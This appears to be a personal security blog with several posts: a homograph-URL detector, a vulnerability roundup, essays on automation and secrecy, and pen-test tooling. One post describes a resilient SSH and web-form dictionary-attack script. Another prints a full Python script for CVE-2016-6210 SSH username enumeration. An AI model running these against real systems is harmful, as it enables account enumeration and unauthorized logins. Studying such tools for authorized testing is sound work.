How well do you scrutinize the URLs that you click in a browser? Are you the wild type who click links before you read them? Or perhaps you are the cautious type — One of the careful number who hover over the link (without clicking), check the address that appears in the browser bar, and that it has a valid certificate (which might not mean so much as people think).
Let’s say that you are trying to get to ‘facebook.com’. You see a link and hover over it. The URL that appears in the browser bar says ‘facebook.com’. You click the link, but it takes you to a phishing site.
What happened? You checked the link. It said it was ‘facebook.com’!
You may have fallen victim to an IDN homograph attack. A homograph is a word that looks the same but has two meanings. In the example above, the user clicked a link that looked like ‘facebook.com’ but had a different meaning. How can that happen? The ‘how’ comes from the ‘IDN’ portion of the name: ‘internationalized domain name’. The URL in the address bar is actually pointing to a domain name. A domain name is the human-readable name of a website. The real address of a website (server) is an IP address, but people aren’t that great at remembering those so domain names make them memorable. For example, you can remember ‘facebook.com’ (the domain name) or you can remember ‘18.104.22.168’ (the ip address). The problem with domain names is that there are many languages. How do you support Mandarin characters in a domain name? Or Russian? You have to internationalize your ‘charset’ (The allowed characters, or individual letters). By internationalizing your charset, you now accept a far greater amount of characters than just simple English (latin-based) characters. This now lets people have domain names in their own language. But there is a down-side. In the charset, the same character may appear multiple times under different languages. For example, Cyrillic and Greek charsets (or alphabets) share similar characters (letters) to Latin. These characters will have separate identifiers, but will look very close, if not identical, to each other.
In the facebook example, the lower-case letter ‘o’ is identified by a character code ‘006F’ for the Latin alphabet (“Small letter o”), but could also be ’03BF’ in the Greek alphabet (small letter Omicron). If I were to register a domain name of facebook.com but with the Greek version of those letters, it may pass an internationalized domain name registration. I could then use this URL to trick people into clicking the link because it will visually look like the real thing. An even simpler example is the substitution of a capital ‘O’ with the number zero (0) in the domain name.
I wanted to see if I could detect these types of attacks and flag them using basic statistics.
My idea was quite simple. Each character in a charset can be broken down into their unique identifier (number) and alphabets (or charsets) are grouped together and thus their identifiers will be close together. The plan was to run basic statistical analysis (mean, median, max, min, and standard deviation) on the individual characters of a URL (or domain name). If there are characters that are outside the usual range, then throw a ‘red flag’. I also had to account for the fact that punctuation may throw off any analysis so there will have to be at least a few methods to identify anomalies — hence the calculation of mean, median, max, min, and standard deviations. I also avoided using neural networks for this particular problem although, as you will see in my summary/future works section, I can see merit in taking it that way.
I wanted a basic proof-of-concept system that would take a corpus of known valid URLs and derive a statistical model from them. Then I would use this model to compare new URLs and determine if they are within the same alphabet or if there was a possibility that they were homograph attacks.
You can see/fork/download the project code here: https://github.com/calebshortt/homograph_detector
The project is quite simple and has two files in the main ‘base’ package. The ‘meat’ of the system is in the analysis.py file. The ‘results.py’ file was used to manage and compare results.
The flow is as such:
The comparison function simply takes the statistics for the given test string and compares it (based on a defined number of standard deviations — default 2) to the model statistics — these are based on mean, median, and the standard deviations themselves (I actually created a metric that is the standard deviation of standard deviations). It also compares the max and min ranges of the character identifiers — this is a crude way to check the number ranges.
Here is the comparison function code:
def compare(self, str_stats, stdev_threshold=2): """ :param str_stats: ResultSet object :param stdev_threshold: (int) number of standard deviations allowed :return: """ print('Analysing: Threshold: 2 standard deviations...') str_max = str_stats.result_max str_min = str_stats.result_min str_mean = str_stats.mean_means str_median = str_stats.mean_medians str_stdev = str_stats.mean_stdevs if not (self.result_min <= str_min <= str_max <= self.result_max): return False, str_stats.all_stats, 'max/min range' r_mean_low = self.mean_means - stdev_threshold*self.stdev_means r_mean_high = self.mean_means + stdev_threshold*self.stdev_means if not (r_mean_low <= str_mean <= r_mean_high): return False, str_stats.all_stats, 'mean' r_median_low = self.mean_medians - stdev_threshold*self.stdev_medians r_median_high = self.mean_medians + stdev_threshold*self.stdev_medians if not (r_median_low <= str_median <= r_median_high): return False, str_stats.all_stats, 'median' r_std_low = self.mean_stdevs - stdev_threshold*self.stdev_stdevs r_std_high = self.mean_stdevs + stdev_threshold*self.stdev_stdevs if not (r_std_low <= str_stdev <= r_std_high): return False, str_stats.all_stats, 'stdev' return True, str_stats.all_stats, None
NOTE: The above code compares the given string to the model ResultSet data in ‘self’.
The system was able to digest a Latin alphabet-based corpus (included in the source) and correctly identify URLs that had characters from other alphabets in them. The interesting thing about this method is that once the model is generated based on the corpus, it can be recorded and reused — no need to regenerate the model (which took the most time). The system was fast and quite accurate at first glance, although more analysis would be needed to make any real claims on its accuracy.
My file load function breaks on some charsets as they are not included in the default encoding for the python file-loading function (that or I missed something). I am working to fix this without clobbering the original encoding of the URL (which would defeat the purpose of this experiment).
This is already starting to look like a neural network would work nicely for this particular problem. I would like to feed the model stats into an ANN with perhaps some other inputs and see how it does. The basic stats I used were able to get decent results, but there are obvious edge cases that standard statistics wouldn’t identify (such as the old ‘substitute the 0 (zero) in for capital O’ trick). A neural network may help catch those.
I would say that it is quite possible to identify IDN homograph attacks using basic statistics and there are a few paths forward to improve accuracy with the results already demonstrated. With that said, nothing will compare to the standard ‘look before you click’ mentality. Users who identify the ‘0 instead of O’ substitution will not leave as much to chance. Systems like these aren’t catch-alls.
It has been an interesting year of breaches, vulnerabilities, and scares. With the more recent ROCA vulnerability in Infineon’s TPM, a widely used module in the Smart Card industry, to the less-exploitable-but-still-serious KRACK vulnerability that makes hacking the WPA2 Wi-Fi security protocol possible, to the supply chain attack of CCleaner, a popular utility program for cleaning up a user’s computer.
What is clearly emerging from such events is that there is still much work to be done in the security space. The Ixia Security Report for 2017 describes an increase in the amount of malware and an increase in the size of company’s attack surface. Attack surface is the exposed, or public-facing, “surface area” of a company. Some have attributed the increase of attack surface to an increased usage and misconfiguration of cloud infrastructure. They argue that misconfiguration of servers looks to be replacing some of the more traditional OWASP top 10 vulnerabilities — such as SQL injection.
But the vulnerabilities listed above (ROCA, KRACK, and the CCleaner supply chain attack) aren’t necessarily cloud-related.
ROCA relates to an incorrectly-implemented software library — specifically the key pair generation. It allows an attacker to factor the private (secret) key just from using the public key. Modern encryption relies on a public key (that is sent to whoever wants it) and a secret (private) key that only the owner has and is used to decrypt messages. Only the private key can decrypt messages to the owner. This vulnerability allows anyone with the public key and some decent computational power (say an AWS cluster used to number-crunch) to get the original private key and decrypt the messages sent to the original owner. The computational power required is in the realm of “expensive but possible”. A targeted attack is a very real possibility, but widespread breaching would be infeasible.
KRACK involves a replay attack. “By repeatedly resetting the nonce transmitted in the third step of the WPA2 handshake, an attacker can gradually match encrypted packets seen before and learn the full keychain used to encrypt the traffic”. This vulnerability requires a physical component as the attacker will have to be on the Wi-Fi network. The cause is inherent to the standard — which means all correctly-implemented versions of the standard are vulnerable (i.e. Libraries that implemented it to spec). Many security practitioners have taken this particular moment in time to explain that the usage of a Virtual Private Network (VPN) would mitigate such attacks, and that Wi-Fi should be an un-trusted source to begin with.
The CCleaner supply chain attack included an injection of malware in a library that is used in the implementation of CCleaner. When the CCleaner program is packaged and deployed it will include this third-party library in its package. This type of attack takes advantage of consumer’s trust in CCleaner, and it is becoming a more popular attack for hackers. For the record, CCleaner has been sanitized and is no longer a threat from this malware. I imagine Avast, the company that offers CCleaner, also took a look at their supply chain trust and revamped some policies around it.
Each of these attacks are in addition to the general increase of attack surface and the misconfiguration of servers (that are becoming more common). There is an increase of supply chain attacks because they clearly work. There are plenty of incorrect implementations of standards or protocols that hackers can take advantage of. There are, far less often, errors in the actual standard or protocol themselves.
It may seem like the odds are piled against an organization’s security team. They are. That is why security is not only the responsibility of the security team, but the entire organization from the executive branch to the developers (who choose to implement specific libraries in their software) to the tech support teams that are often on the “front-line” with customers.
Education is always a good first step.
For those who haven’t watched ‘The Secret Life of Walter Mitty’, I highly recommend a showing. It follows Walter Mitty, a daydreaming “negative asset manager” at LIFE magazine during its conversion to a fully-online offering. It truly is a visually stunning work.
The opening premise, LIFE magazine moving online and the inevitable downsizing and layoffs, struck a chord that has been, and is still, resonating: Is there a place for morality in software developer’s drive toward automation and efficiency?
One would be quite right in saying that the issue of ‘worker layoffs due to automation’ is not a new problem. History is full of examples. What piques my interest, however, is the generality of software automation. The immense reach of software naturally leads to an immense number of avenues for automation.
For example: I found myself talking with a colleague about the problems that they were having with some of their staff. When we finally distilled the problem down to its essence, we discovered that a great portion of his department was dedicated to the handling and sorting of files (originally electronic, then printed, then sorted and filed). I found myself flippantly stating that I could replace most of his department with a script.
My watching of ‘Walter Mitty’ sparked a wave of introspection, and a single question welled within me: If I could write a script that replaces an entire department, should I?
The script would increase the company’s efficiency through a significant reduction in cost. But why is efficiency so important that one would look for avenues to terminate the employment of others? Who benefits from it? Recently, it seems, the cost savings would not make its to the remaining employees but would manifest as bonuses for an executive, or manager, or perhaps dividends for shareholders.
Is inefficiency really that bad? In this case a department is being employed to do work. They are doing the work satisfactorily. Their wages pay for local food, rent, and expenses. This provides a boon to the local economy. If the populace is scraping by financially they surly will not be purchasing cars, houses, or other ‘big ticket items’. Would this not stagnate the greater economy?
Would a 100%-efficient company have anyone working there?
My authorship of this script directly instigates the termination of those employees. The causative relationship is undeniable.
Such scenarios are drenched with hubris as such mechanisms are en-route to also replace developers. In this we are the architects of our own obsolescence and ultimate demise: Dr. Frankenstein would surely have words with us. It is pure arrogance to assume such devices would not also be applied towards our craft.
Some may argue that apparatuses are in place to mitigate such effects, or that the evolution of the market warrants the employee’s termination: ‘They have become obsolete and must retool to stay competitive’, or ‘that is what welfare is for’, or ‘universal basic income is the future for this very reason’. Such comments do not address my question, ‘If one could write a script to replace a large group of people’s jobs, should they?’, rather they address the symptom, or after-effects, of such a decision — The employees are terminated, now what?
Perhaps this is the issue?
At the risk of sounding defensive I must note that I am not one to resist change. Resistance to change in our particular field is a doomed prospect to say the least. But one must address the social and economic implications of their decisions. One must have a conscience.
I do not have an answer. The creation of software is a technical achievement, a work of art, a labor of love, and wildly creative. It behooves those who embark on such journeys to consider their implications. Perhaps it is our hubristic tendencies as developers, or our arrogance, that drives us to construct our own monsters. Dr. Frankenstein would surely have words with us.
In running a mock pen-test I ran into an interesting wall with one of my tools, Burp Suite Free Edition. I also discovered some limitations in ncrack, and metasploit’s auxiliary/scanner/ssh/ssh_login tool.
Let’s start at the beginning.
What I needed was a simple dictionary attack tool that would take a list of usernames and a list of passwords and try them on the target. All of these tools do exactly this, but I ran into some limitations that caused them to be unusable for my purposes — and in this particular use case. My target was a group of VMs that simulated servers that were under higher-than-average load. SSH was enabled and one included a web form to sign into (not using ssh accounts). The servers were prone to dropping connections and timing out.
What this did was wreak havoc on ncrack and ssh_login. There are parameters to help with timing and level of aggressiveness (i.e. ssh_login’s ‘BRUTEFORCE_SPEED’ parameter, and the ‘cd’ and ‘T<0-5>’ flags for ncrack), but if a connection took too long or dropped completely, the tools would simply move on to the next username and password combination. In my particular use-case this was unacceptable. I tried using hydra with better-but-still-limited success (Their -w <time> flag would help). What I decided was to quickly run my own simple script.
Considering my requirements (expecting longer-than-normal wait times/timeouts/etc) I was not worried about writing my script in anything particularly fast (I chose Python). What I did want was a tool that was robust against varying timeouts and lengthy responses. I did this with a linear back-off and retry approach. I didn’t want exponential back-off as I still needed to complete the process — linear would do fine.
The meat of the script simply looked as follows:
connected = False wait_backoff = 1 max_attempts = 5 curr_attempt = 0 for user in userlist: for pw in passlist: while not connected: try: curr_attempt += 1 connect to target with user and pw except ssh problem: reinitialize ssh connection wait for wait_backoff seconds increment wait_backoff check if curr_attempt is at or over max_attempts exit with error message else: connected = True connected = False curr_attempt = 0 wait_backoff = 1
The full code can be seen at https://github.com/calebshortt/sshBF/blob/master/ssh_bruteforce.py. This isn’t a brute-force attack but a dictionary attack. This solved my problem of hydra, ssh_login, and ncrack completely stopping if they encounter some slow/laggy servers.
After I had completed my ssh audit, I turned my attention to the login page web form. It was an HTTP POST to an API endpoint. Burp Suite was my first thought and started it up. I had the free edition and figured this was simple enough to not need a paid version of the tool. I was wrong. Burp Suite Free Edition technically allows dictionary attack on web server but throttles the attack to the point that it is unusable, an obvious ploy to make the user purchase the full version. I decided to modify my script for ssh attacks and use it on web forms instead.
This was surprisingly easy and required little change on my part of the ssh script, and it was significantly faster than BURP Suite. I was able to complete my audit with a few extra tools.
The web form code can be found at: https://github.com/calebshortt/web_dict_bf
The EFF has published a well-cited and informed article on why they view the current trend of dragnet surveillance to be thoroughly against the constitution of the U.S.
Even if you are not an American, this article touches on the ideals of many. It describes the context around why the Fourth Amendment was included and goes into specific detail as to who and why they thought it so important:
“Using ‘writs of assistance,’ the King authorized his agents to carry out wide ranging searches to anyone, anywhere, and anytime regardless of whether they were suspected of a crime. These ‘hated writs’ spurred colonists toward revolution and directly motivated James Madison’s crafting of the Fourth Amendment.”
I highly recommend reading the entire article: The NSA’s “General Warrants”: How the Founding Fathers Fought an 18th Century Version of the President’s Illegal Domestic Spying
There are usually two general steps for a software exploit to be created.
The first step is the vulnerability discovery. This is the hardest of the two steps. It requires in-depth knowledge about the target software, device, or protocol and a creative mind that is tuned to edge cases and exceptions.
The second step is the exploitation of the discovered vulnerability. This requires the developer to take the vulnerability description and write a module or script that takes advantage of it.
This article will address the second step: Exploit creation.
First, where do we find vulnerabilities for software if we do not discover them ourselves? There are online databases that store published vulnerabilities (and may include example code) in a searchable format. A few are CVE, exploit-db, or the NVD.
Looking through these databases we will see that all published vulnerabilities have a unique CVE identifier. They uniquely identify each vulnerability that has been discovered and confirmed. Using the databases we can search for potential vulnerabilities of a particular target (Note: This is similar to what a bot might try, after it has scanned a new target server, to find any published vulnerabilities).
Some vulnerability descriptions may even sample code — such as CVE-2016-6210. This makes it trivial to write a script that may utilize this vulnerability. For example, we could use the code given to us in CVE-2016-6210 and expand it to make a command-line script that takes a list of known usernames and tries each one… Which is the vulnerability the CVE describes: “SSH Username Enumeration Vulnerability”.
This script will not breach the system, but what it will do is try to find valid usernames via SSH. This vulnerability may lead to, or become part of, a larger attack. It is important to patch all discovered vulnerabilities as you don’t know how an adversary will try to attack your system.
Given the sample code, here is our improved version:
import paramiko import time import argparse import logging logging.basicConfig() class Engine(object): file_path = None target = '' userlist = ['root'] calc_times =  req_time = 0.0 num_pools = 10 def __init__(self, target, filepath=None, req_time=0.0): self.req_time = req_time self.target = target self.file_path = filepath if self.file_path: self.load_users(filepath) def load_users(self, filepath): data =  with open(filepath, 'r') as f: data = f.read().splitlines() self.userlist = data def partition_list(self, p_list): p_size = len(p_list) / self.num_pools for i in xrange(0, len(p_list), p_size): yield p_list[i:i+p_size] def execute(self): for user in self.userlist: self.test_with_user(user) def test_with_user(self, user): p = 'A' * 25000 ssh = paramiko.SSHClient() start_time = time.clock() ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) end_time = time.clock() try: ssh.connect(self.target, username=user, password=p) except: end_time = time.clock() total = end_time - start_time self.calc_times.append(total) avg = reduce(lambda x, y: x + y, self.calc_times) / len(self.calc_times) flag = '*' if total &amp;gt; avg else '' print('%s:\t\t%s\t%s' % (user, total, flag)) time.sleep(self.req_time) ssh.close() def main(ip_addr, filename=None, req_time=0.0): if ip_addr == '' or not ip_addr: print('No target IP specified') return if filename == '': filepname = None engine = Engine(target=ip_addr, filepath=filename, req_time=req_time) engine.execute() if __name__ == "__main__": parser = argparse.ArgumentParser(description='Simple automated script for CVE 2016-6210 -- OpenSSHD 7.2p2 &amp;gt;= version') parser.add_argument('ip', help='[Required] The IP of the target server') parser.add_argument('-u', '--userlist', help='Specify a filepath with a list of usernames to try -- one username per line') parser.add_argument('-t', '--time', help='Set the time between requests (in seconds)') ip_addr = None filename = None req_time = 0.0 args = parser.parse_args() if args.ip: ip_addr = args.ip if args.userlist: filename = args.userlist if args.time: req_time = float(args.time) main(ip_addr, filename, req_time)
It is much easier to write exploits for already-discovered vulnerabilities than it is to discover them yourself.
This is why it is vital that system admins keep their servers and software up to date.
Suppose that, while teaching a class some engaging topic, I keep a secret from the class and only reveal it at the end of the term. This secret provides a sudden realization to the students that they can take into their next year — A real ‘Aha! moment’. I only ask them that they do not reveal the secret to any classes that haven’t taken the course yet so that they can have the same experience. This may work for a while, but inevitably one student, through malice or ignorance, will reveal the secret to someone they shouldn’t have. This then spreads throughout the whole student body until the experience for all future classes is ruined.
The value of a secret can be tied inherently to its secrecy. In the case above, revealing the secret leads to a realization and experience that would have been lost if the knowledge was simply given in a standard manner. We see this in varying degrees in many mediums.
Suspense films can rely on building a feeling without ‘revealing’. String along the audience and tease them with sudden glimpses — or was it? Sometimes the ‘secret’ is never actually revealed and the audience is left wondering what ‘it’ could have been — a lasting effect to be sure! Sometimes the ‘secret’ is revealed to the audience but not to the characters, and the audience is left to observe the resulting effect on the unknowing participants. All experiences in the case of suspense are tied directly to the disclosure or non-disclosure of a secret — and to whom.
Consider the explorer. In ages past an explorer set out into unknown lands or seas to make the ‘unknown’ known. Perhaps it was for knowledge, or perhaps it was for fame, but many died in pursuit of it. Today we can say the same about space. Our chosen few who lead our race in discovering one of the last great ‘unknowns’.
Our desire to discover what is not known is insatiable. We thrive on the pursuit. We revel in it.
Now, perhaps, you are wondering why the title of this article is ‘The Value of A Secret’ and not ‘Humans Love to Discover’. And my answer to you would be that it is important to set the stage for things that are yet to come.
Humans do love to discover — Even if it means that the discovery will reduce their enjoyment.
Let’s consider the magician. We can rest assured that the man standing on stage and pulling rabbits out of hats does not, for better or worse, have divine powers. He has honed his craft that is to be sure, but he is no wizard. He is an expert at deceiving. Our wonder stems from the curiosity welling within each person sitting in the faux-velvet seats that, at one time, may have doubled as a beer coaster. It is that curiosity that may also drive us to speculate on how the trick was done or to buy a ticket to see it again. The experience is in the deception. Once the secret is revealed the experience is ruined for all, and the poor magician who mastered his craft must now work ever harder and devious in his deceptions.
There can be value for those to whom the secret is not revealed — and never is. Secrets can be a source of awe and wonder. They can drive one to build a ship and cross vast oceans, throw caution to the wind and trek into unknown lands, and build a rocket and ride it to the moon.
For the explorer, who is driven by such experiences, there is irony in the fact that their very actions reduce the total number of things left to discover — no matter how little the contribution.
With the awe and inspiration that secrets can evoke it is important to note that some secrets are meant to be discovered and shared. What would have happened if Alexander Fleming did not discover penicillin and shared it with the world? What about the snake-oil salesmen and ‘men with powers’ who used their secrets not to entertain but to deceive many to their detriment. We would agree that it is important to expose frauds and predatory practices.
This is not to say that secrets should never be revealed but to explain that there is value in many secrets staying secrets. This value may be in the form of awe, wonder, suspense, entertainment, and inspiration just to name a few. Alas it is important to note that secrets also protect you.
How do you hide dissidents from oppressive governments without secrets? Just because one lives in a developed country does not make them immune to policy change and legislation. What about communication? How can you talk with the assurance that there isn’t anyone listening in to your conversation? Shouldn’t your bank information be kept secret from prying eyes?
Sometimes is it important to have secrets. Secrets that are hidden from everyone but the very few people you trust to hold them. If one of your trusted few ever reveals the secret they are removed from the privileged few.
Many governments in recent times should be removed from the privileged few.